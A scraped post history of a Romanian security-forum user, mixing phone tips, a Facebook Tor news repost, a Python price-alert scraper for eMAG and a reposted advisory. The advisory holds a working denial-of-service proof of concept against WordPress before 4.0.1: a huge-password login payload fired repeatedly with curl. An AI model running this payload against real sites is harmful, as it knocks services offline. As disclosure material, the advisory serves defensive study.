-
Posts
2060 -
Joined
-
Last visited
-
Days Won
11
Posts posted by LLegoLLaS
-
-
Ala-i!Mi-am permis si l-am modificat pentru sleed.Mersi
-
TAXz bun...si...legatura intre biologie si securitatea online?
-
QR code-ul expira in gen un minut si tre sa generezi altul
Also: !!! Whatsapp web functioneaza doar cu telefonul conectat la net,cand ti-ai deconectat telefonul de la net nu mai poti tirmite/primi mesaje pe web.
Astfel ca devie putin mai safe...dar mai putin usefull
-
asta ca sa nu zici ca am ceva cu tine
-
Treaba cu parola din 5 cifre la un cont bancar e cretina (la torrente am parola mai complicata ) dar...Ce-are de nu e bun digipassu? Chiar daca digipassu are o parola de 4 cifre (un pin pe care ti-l setezi tu) el se blocheaza daca bagi parola de (3?) ori gresit.Mie mi se pare ok.
- 1
-
Returneaz?-l prin curier la magazinul de unde l-ai luat.dai PM pentru detalii
- 1
-
gen Cell-broadcast banuiesc.Asa cum te anunta in unele zone (mi s-a intamplat in Serbia) in ce localitate esti.Doar ca intr-un perimetru mult mai mic
-
E de fapt acel Flexi bonus,right?In functie de cat incarcati puteti sa va luati si bonus cu MB trafic
-
adus,a se citi furat.
Nu incurajam asta aici pe forum
-
+1 .Thanks nu mai merge nici linkul mega
-
Exista la noi curier care transporta animale?
-
====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Wordpress < 4.0.1 allows an
attacker to send specially crafted requests resulting in CPU and memory
exhaustion. This may lead to the site becoming unavailable or
unresponsive (denial of service).
====================================================================
Time Line:
====================================================================
November 20, 2014 - A Wordpress security update and the security
advisory is published.
====================================================================
Proof of Concept:
====================================================================
Generate a pyaload and try with a valid user:
echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
{1..1000000} >> valid_user_payload && echo -n "&op=Log
in&form_id=user_login" >> valid_user_payload
Perform a Dos with a valid user:
for i in `seq 1 150`; do (curl --data @valid_user_payload
[url]http://yoursite/wordpress/?q=user[/url] --silent > /dev/null &); sleep 0.5; done
====================================================================
Authors:
====================================================================
-- Javer Nieto -- [url=http://www.behindthefirewalls.com]Hacking while you're asleep[/url]
-- Andres Rojas -- [url=http://www.devconsole.info]# /dev/console | "In the beginning … Was the command line" (Neal Stephenson)[/url]
====================================================================
References:
====================================================================
* [url]https://wordpress.org/news/2014/11/wordpress-4-0-1/[/url]
* [url]https://www.drupal.org/SA-CORE-2014-006[/url]
*
[url=http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html]Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep[/url]
*
[url=http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html]Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep[/url]
* [url=http://www.devconsole.info/?p=1050]Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console[/url]sursa;bugsearch.net
-
#!/usr/bin/env python import smtplib import urllib2 import random import re import time #panou de configurare email = " " #unde vrei sa primesti ofertele smtp = "smtp.gmail.com" loginuser = "@gmail.com" loginpass = "" chilipir = 25 #pretul(ron) sub care sunteti anuntat interval_timp_cautare = 600 # in secunde print r""" #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#\ #.........RSTforums.com........#-\ #.............Usr6.............#--\/ #...Cautatoru de chilipiruri 1.2...#--/\ #..............................#-/ #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#/ """ def email_sender(TEXT): #print TEXT message = 'To:' + email + '\n' + 'From: ' + loginuser + '\n' + 'Subject:Chilipir \n\n' + TEXT server = smtplib.SMTP(smtp, 587) server.ehlo() server.starttls() server.login(loginuser, loginpass ) server.sendmail(loginuser, email, message) server.quit() print "Oferta a fost expediata" return expediate = [] while True : expediat = "" random_nr = str(random.randint(10**16,99999999999999999)) ua = "Opera/%s.%s (Windows NT %s.%s) Presto/%s.%s.%s Version/%s.%s" \ %(random_nr[0], random_nr[1:3], random_nr[4], random_nr[5], random_nr[6], random_nr[7:9], random_nr[10:13], random_nr[13:15], random_nr[15:17]) try: site = "http://www.emag.ro/resigilate/sort-priceasc" req = urllib2.Request(site, None, {'User-Agent' : ua}) continut = urllib2.urlopen(req, timeout=30).read() match = re.findall('\"money-int\"\>(\d*)\<\/span\>\<sup class=\"money-decimal\"\>\d*.+\n.+\t+.+\n\t.+\n.+\n.+\<a href=\"(.+#resigilate)"',continut) for every in match: pret, link = every if int(pret) <= chilipir: link = "http://www.emag.ro" + link unic = str(pret) + link if unic not in expediate: expediat += str(pret) + "\t" + link +"\n" expediate.append(unic) except Exception as E: email_sender(E) if len(expediat) >= 1: email_sender(expediat) time.sleep(interval_timp_cautare) print time.strftime("%c"), "nimic nou" exit()
adaptare sa mearga cu cont de gmail
LE:
daca e cont nou posibil sa nu mearga prima data (blocheaza loginul,nefiind secure) si sa primiti un mail cu Enable less Secure Access.Dupa ce bifati mere
- 1
-
ma tenteaza jocu'
37
thanks pentru idee
-
E baiat bun Nae.munceste ieftin
-
update firmware la htc, schimba simul la vodafone (gratuit sau 10-20 de lei)
-
probabil capul de citire ti-a futut platanul/platanele.Garantie si juri pe rosu ca nu l-ai scapat pe jos
-
postati stirea asta aici
www. c r e s t i n o r t od o x .ro/ forum/
))
- 1
-
F? un telefon din piese.
Ast?zi cumperi placa de baz?, mâine procesor peste 2 zile ram.
poate maine displayul,carcasa ca ramu' e lipit de placa
on: da,practic e alt telefon
edit: nu mai umbla cu telefoane furate
-
de ce sa nu upgradezi la android 5.0 lolipop?
pentru ca probabil nu l-a portat nimeni pe 4x HD.Din ce sitiu e bazat pe nvidia tegra deci e mai greu. @vHacker vezi xda developpers.acolo o sa gasesti multe romuri si moduri pentru telefonul tau
-
The so-called darknet, which is accessible via the anonymizing Tor network, has a reputation for being home to many disreputable sites. But now the biggest social network in the world is available via Tor. Facebook announced Friday that it is available to Tor users via a .onion address--the pseudo-top-level-domain used by Tor hidden services.
Anyone wishing to connect to Facebook via Tor can do so by typing https://facebookcorewwwi.onion/ into their web browser when connected to Tor (it won't work otherwise). Facebook says Tor users who visit the social network's .onion site are protected with end-to-end encryption since the .onion site connects directly to a Facebook data center via SSL.
Facebook's new .onion site makes it easier for users to connect to the social network via Tor without running into problems. Facebook's security systems, for example, may flag a Tor-connecting account for being hacked. Like a hacked account, Tor user traffic can appear to be coming from several different countries in a short period of time.
Why this matters: Facebook's very nature as a social network where anonymity is shunned may seem a strange candidate for creating a Tor site. But there are many reasons to connect to Facebook as securely as possible without revealing your location despite the loss of anonymity on Facebook itself. Participants in the 2011 protests against the Mubarak regime in Egypt, for example, used Facebook to mobilize protesters and inform the public.
A first for SSL
Facebook's SSL connection via Tor is also a first for the world of .onion sites. The social network's Tor hidden service is the first .onion address to receive a legitimate SSL certificate from an issuing certificate authority, according to a tweet from Runa Sandvik, who contributes to the Tor Project.
An SSL certificate is used by your browser to verify that you are connecting to the site you think you are. Facebook says it wanted to use an SSL certificate that cites its .onion address to give users confidence that they were indeed connecting to Facebook and not a malicious imitation.
sursa: pcworld
ce cacat mai vor?
-
Si eu am returnat prin curier un procesor fara coolerul cu care a venit.n-au comentat (dar era in cutia lui)
-
-
Am votat da pentru motivele date de voi ma sus.
Dar daca stau sa ma gandesc mai bine,RST e forum de securitate it.Una din ideile fundamentale ale securitatii online e anonimitatea.Dup-aia v-aud cu topicuri "A gasit mama un cacat in cutia postala insotit de un bilet de amenintare.Ce pot face?"
giefroot (Root Android)
in Programe hacking
Posted
Ar trebui si titlul modificat,e tool specific pentru un anumit model.Ceilalti producatori,prin modificarile de firmware,repara uneori bugurile astea si se pot roota doar cu vulnerabilitati ale firmware-ului respectiv
sfat: nu incercati toolu' ala pe alte teelfoane decat huawei